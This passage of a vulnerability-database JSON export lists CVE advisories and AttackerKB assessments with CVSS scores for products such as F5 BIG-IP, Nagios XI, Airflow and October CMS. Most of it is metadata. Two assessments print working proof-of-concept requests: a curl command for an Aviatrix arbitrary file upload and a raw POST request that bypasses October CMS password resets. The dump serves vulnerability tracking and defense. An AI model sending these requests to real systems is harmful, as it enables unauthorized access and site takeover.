Successful exploitation of this vulnerability could result in a denial of service or execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-17T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Buffer Overflow (CVE-2021-22991)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2022-02-17T00:00:00", "id": "CPAI-2021-1087", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:21", "description": "A command injection vulnerability exists in Node.JS System Information. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "Node.JS System Information Command Injection (CVE-2021-21315)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2021-1058", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:23", "description": "An authentication bypass vulnerability exists in Apache Airflow API. 
Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Airflow Authentication Bypass (CVE-2020-13927)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2020-3454", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:58", "description": "An information disclosure vulnerability exists in Microsoft Exchange. 
Successful exploitation could result in the disclosure of sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Information Disclosure (CVE-2021-33766)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-09-05T00:00:00", "id": "CPAI-2021-0547", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-23T23:31:36", "description": "A server-side request forgery vulnerability exists in VMware vRealize Operations Manager. 
Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:29:23", "description": "An information disclosure vulnerability exists in Oracle Business Intelligence Enterprise Edition. 
Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Business Intelligence Enterprise Edition Information Disclosure (CVE-2020-14864)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2020-3453", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "attackerkb": [{"lastseen": "2023-05-27T14:37:29", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. 
The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25297", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297"], "modified": "2021-02-19T00:00:00", "id": "AKB:E3841EB6-6FF5-4072-8716-B4BD203AFDB0", "href": "https://attackerkb.com/topics/g6U1KDU84X/cve-2021-25297", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:37:31", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. 
The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25298", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25298"], "modified": "2021-02-19T00:00:00", "id": "AKB:58421098-D895-41C4-95F2-2B3E4E3CD2C0", "href": "https://attackerkb.com/topics/c1866NX9mx/cve-2021-25298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:18:51", "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. 
Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\n \n**Recent assessments:** \n \n**JoyGhoshs** at October 09, 2021 6:33am UTC reported:\n\n### Description\n\nThis vulnerability allows an attacker to create and store a file on the Aviatrix controller. The exploitation phase doesn\u2019t need any user authentication, nor does it require any other user interaction; it can simply be exploited using curl. Here is one example.\n \n \n curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo \"Vulnerable Poc\";?>'\n \n # after executing the previous command if the target is vulnerable this will create a php file on this path\n \n https://vulnerable.target.com/v1/poc \n \n\nAn attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.\n\nOr you can use this exploit to do the exploitation more easily: <https://github.com/JoyGhoshs/CVE-2021-40870>\n\n\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-40870", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-09-24T00:00:00", "id": "AKB:E355AB47-21A0-4270-B1B7-31327C5DB3E0", "href": "https://attackerkb.com/topics/t5RjZrPTdl/cve-2021-40870", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T23:18:39", "description": "octobercms is a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.\n\n \n**Recent assessments:** \n \n**kevthehermit** at January 14, 2022 5:01pm UTC reported:\n\n### Overview\n\nThis is a simple Type Confusion / Juggling vulnerability.\n\nOctober CMS will check to see if the user-supplied reset code matches the value in the database `return ($this->reset_password_code == $resetCode);` \nIf we can send a boolean value in place of a reset code we can bypass this check.\n\nLaravel has a feature that if an HTTP POST request is sent as JSON then it will be converted to a matching form data set; however, the types will persist.\n\nTo exploit this vulnerability we simply need to set the `Content-Type` to JSON and structure our POST request accordingly. 
An example POST is shown below.\n \n \n POST /backend/backend/auth/reset/1/[] HTTP/1.1\n Host: 172.17.0.2\n Content-Length: 162\n Cache-Control: max-age=0\n Upgrade-Insecure-Requests: 1\n Origin: http://172.17.0.2\n Content-Type: application/json\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Referer: http://172.17.0.2/backend/backend/auth/reset/1/a\n Accept-Encoding: gzip, deflate\n Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9\n Connection: close\n \n {\"_session_key\":\"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC\",\"_token\":\"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS\",\"postback\":1,\"id\":1,\"code\":true,\"password\":\"hello\"}\n \n\n### In the Wild\n\nThis has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites \u2013 <https://twitter.com/KimZetter/status/1481890639029551106>\n\n### PoC\n\nA proof of concept python script that will attempt to reset the password for the admin account has been published \u2013 <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>\n\n### Detection\n\nAn attacker attempting to exploit this attack will need to trigger a password reset email. 
If you observe password reset emails then check access to the server and respond accordingly.\n\n### Mitigation\n\nApplying the patches will successfully mitigate against this attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-32648", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2021-09-02T00:00:00", "id": "AKB:EB3F5389-7A37-45E3-AF6F-6C5B475789C9", "href": "https://attackerkb.com/topics/GNepughGqx/cve-2021-32648", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-05-28T20:18:59", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. 
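The October CMS password-reset check quoted in the CVE-2021-32648 assessment above (`$this->reset_password_code == $resetCode`) fails because PHP's loose comparison treats any non-empty string as equal to `true`, and Laravel hands a JSON request body to the controller with its JSON types intact, so `"code":true` arrives as a PHP boolean rather than the string "true". The PHP below is an added illustration, not code from October CMS, Laravel or the assessment: `vulnerableResetCheck` reproduces the quoted comparison, `hardenedResetCheck` is one strict replacement, and the function names and the stored reset code value are constructed for the example.

```php
<?php
// Added example, not October CMS or Laravel code: it reproduces the loose
// comparison quoted in the CVE-2021-32648 assessment and a strict replacement.
// Function names and the stored code value are constructed for this example.

/** The check as quoted: return ($this->reset_password_code == $resetCode); */
function vulnerableResetCheck(string $storedCode, $suppliedCode): bool
{
    // Loose ==: when either operand is a bool, PHP casts the other operand
    // to bool, so any non-empty stored code compared against true is "equal".
    return $storedCode == $suppliedCode;
}

/** Strict replacement: refuse non-strings, then compare in constant time. */
function hardenedResetCheck(string $storedCode, $suppliedCode): bool
{
    // A wrong type is a failed attempt, never something to coerce.
    if (!is_string($suppliedCode) || $suppliedCode === '') {
        return false;
    }
    // hash_equals() is byte-exact and timing-safe; no juggling is possible.
    return hash_equals($storedCode, $suppliedCode);
}

// Laravel parses an application/json body with JSON types preserved, so the
// request body shown in the assessment delivers "code":true as a PHP bool.
$jsonBody = json_decode('{"id":1,"code":true,"password":"hello"}', true);

// The same field submitted as a form-encoded body arrives as the string "true".
$formCode = 'true';

$storedCode = 'a1b2c3d4e5f6a7b8'; // constructed stand-in for reset_password_code

printf("loose  ==, JSON bool     : %s\n", var_export(vulnerableResetCheck($storedCode, $jsonBody['code']), true));
printf("loose  ==, form string   : %s\n", var_export(vulnerableResetCheck($storedCode, $formCode), true));
printf("strict,    JSON bool     : %s\n", var_export(hardenedResetCheck($storedCode, $jsonBody['code']), true));
printf("strict,    form string   : %s\n", var_export(hardenedResetCheck($storedCode, $formCode), true));
printf("strict,    correct code  : %s\n", var_export(hardenedResetCheck($storedCode, $storedCode), true));
```

Run it with `php`: the loose check accepts the JSON boolean and rejects the form-encoded string, while the strict check rejects both and accepts only a string byte-equal to the stored code. In a Laravel controller the same type gate can be enforced before the comparison runs with `$request->validate(['code' => 'required|string'])`, which rejects a boolean or array `code` field with a validation error instead of passing it into the comparison.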
In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-22991", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2021-04-06T00:00:00", "id": "AKB:510644E5-3B60-4F1C-9390-7CD9A8015090", "href": "https://attackerkb.com/topics/scDa3YuE1j/cve-2021-22991", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T23:20:21", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. 
The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25296", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2021-02-19T00:00:00", "id": "AKB:532E90DB-4495-454E-B0D0-8DD690C03B16", "href": "https://attackerkb.com/topics/faJGD9TxcJ/cve-2021-25296", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T14:43:32", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. 
A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-11978", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2020-07-24T00:00:00", "id": "AKB:3B81CEA4-F430-469B-B9D6-4375FF9F7D5E", "href": "https://attackerkb.com/topics/dyrqwSuLUp/cve-2020-11978", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:37:28", "description": "The System Information Library for Node.JS (npm package \u201csysteminformation\u201d) is an open source collection of functions to retrieve detailed hardware, system and OS 
information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() \u2026 do only allow strings, reject any arrays. String sanitation works as expected.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21315", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-23T00:00:00", "id": "AKB:E72B9F04-6006-41F4-A0B3-9639896AA934", "href": "https://attackerkb.com/topics/cbd8mHseCX/cve-2021-21315", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 